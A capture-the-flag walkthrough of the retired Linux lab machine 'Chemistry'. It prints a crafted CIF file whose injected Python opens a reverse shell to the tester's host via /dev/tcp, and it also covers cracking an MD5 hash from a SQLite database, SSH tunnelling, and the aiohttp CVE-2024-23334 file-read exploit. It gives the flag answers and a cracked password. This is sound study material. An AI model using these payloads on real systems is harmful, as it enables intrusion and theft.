Chemistry (Easy)

Description

Difficult -> Easy
OS -> Linux
State -> Retired
Tags -> Pending

Write-up

I started doing an initial port scan using Nmap

nmap 10.129.92.228 -p- -Pn --min-rate 2500 -oN scan.txt

Then I did an exhaustive scan to learn more about the services running on the open ports

nmap 10.129.92.228 -p22,5000 -sVC -oN serv_scan.txt

I found the HTTP protocol running on port 5000, in this case, a Universal Plug and Play (UPNP) service that helps in network discovery. So to check it, I navigated to the direction using the browser, and there I found a simple site that seemed to be a program for processing files related to chemistry. I tried to register and log in, which sent me to a dashboard with an option to upload a Crystallographic Information File (CIF)

To learn more about the HTTP protocol, you can go here

I didn't know about this type of file, but the site also allowed me to download a sample file to check which parameters the page processed and the file format

As I was able to modify and reupload the file to the web, it could lead to a possible File Upload vulnerability, so I could try to leverage it to gain a Reverse Shell from the server. To do so, I checked on the web for possible CVEs and exploits. In this process, I found an interesting repository with a vulnerability that affected the 2024.2.8 or lower versions and could help me gain RCE on the target

To learn more about File Upload exploitation, you can go here

With this, I crafted a modified version of the CIF file to execute commands remotely. In that case, I modified it by adding a script to gain the Reverse Shell

exploit.cif

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.58/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

I used a custom payload for the reverse shell because some standard payloads didn't work, and the script had special characters that needed to be interpreted

After that, I uploaded the file to the system and set a Netcat listener on my machine to receive the connection. Then, I clicked the View button to run the internal script, observing that the page kept loading and checking that the listener had caught the shell from the host. I also sanitized the terminal to work more comfortably and checked which user I was, having now access as the app user, the one from the web server

nc -nvlp 4444

To learn more about the sanitization process, you can go here

Then I navigated through the system, checking for a possible way to do lateral movement or privilege escalations. I found that in the /home folder, there was a folder for another user named rosa. I listed the files under this directory and found a user.txt file, but when trying to read its content, I didn't have the proper permissions

In these circumstances, I needed to do lateral movement to gain access as rosa. Searching for any clue about how to do it, I found that under the /home/app/instance folder (which contained files of the web service), there was a database.db file, and checking its type with the file command, I confirmed it was a SQLite3 database

Knowing this, I interacted with it and retrieved some information. I queried information about the tables and found a user table, and reading its information, I found some users and values that could be hashes for passwords. I noticed in this case, the same user rosa was in this database, so I could assume it was the system user and try to crack the hash to obtain the password

sqlite3 database.db
sqlite> .tables
sqlite> SELECT * FROM user;

To do that, I used the online tool Crackstation to recognize and break the hash, and I was lucky because it was a known MD5 hash that revealed the password unicorniosrosados

To learn more about MD5 or other hashes, you can go here

Then, I tried to connect through SSH to the rosa user using this password and got in successfully. I also sanitized the terminal again to interact with it better

To learn more about the SSH protocol, you can go here

With that, I had proper reading permissions to read the user.txt file in the /home/rosa folder and retrieved the user flag

cat user.txt

With that, I got the user flag

Answer: 4322e11a0bd69f9f5c49e46ce07b3f35

Then, I had to find a way to escalate privileges. I started searching, but after a while, I didn't find anything. So, to facilitate the process, I tried using Linpeas to help me find possible paths for the escalation. After importing it and running it, in the results obtained, I found there was a service running locally on port 8080, which is normally used for some web servers

As it is locally deployed, I couldn't access the service directly through a browser, but as I had access to the system via SSH, I could try to make a tunnel via local port forwarding to access it from my machine. I did the tunneling process, and to confirm it had worked, I accessed the service on the browser and observed the web service deployed correctly

ssh -L 7777:127.0.0.1:8080 rosa@10.129.92.228

I explored the site, which seemed to be a statistics service, but after a while, I didn't find anything interesting, so I tried to retrieve information on the components. I used the curl command to send a petition and retrieve some information based on the headers of the response

curl http://localhost:7777 --head

I found the HTTP server was using the aiohttp Python library to deploy the web content and its corresponding version. With this, I searched for some possible related CVEs, and after some research, I found a GitHub repository with a POC for the CVE-2024-23334, which exploited a Local File Inclusion vulnerability on versions 3.9.1 or lower of aiohttp to read files as the root user

To learn more about Local File Inclusion exploitation, you can go here

I downloaded the exploit and used it to automate the attack, but I needed to find a static route to execute the attack. With a little research, I found some standard folders for static files. I tried some of them in the exploit and noticed that using the /assets route, it worked

Finally, as I was reading files as the root user, I tried accessing the /root folder and reading the content of the root.txt if it existed, and with that, I luckily retrieved the root flag

With that, I got the root flag and pwned the machine

Answer: 861d48a12f6494bc174cca5585a3a3e1

Alternative Privilege Escalation

I could also escalate privileges by retrieving information on the SSH keys for the root user. I checked for them in the standard /.ssh folder using the default name id_rsa, and fortunately, the file existed and leaked the private key

With this, I copied the key into a local file and used it to access the target via SSH. With that done, I could go to the /root folder and read the root.txt file to retrieve the root flag

ssh root@10.129.92.228 -i id_rsa

To learn in detail about the abuse of SSH keys for privilege escalation, you can go here

PreviousCrafty (Easy)NextTitanic (Easy)

Last updated 7 months ago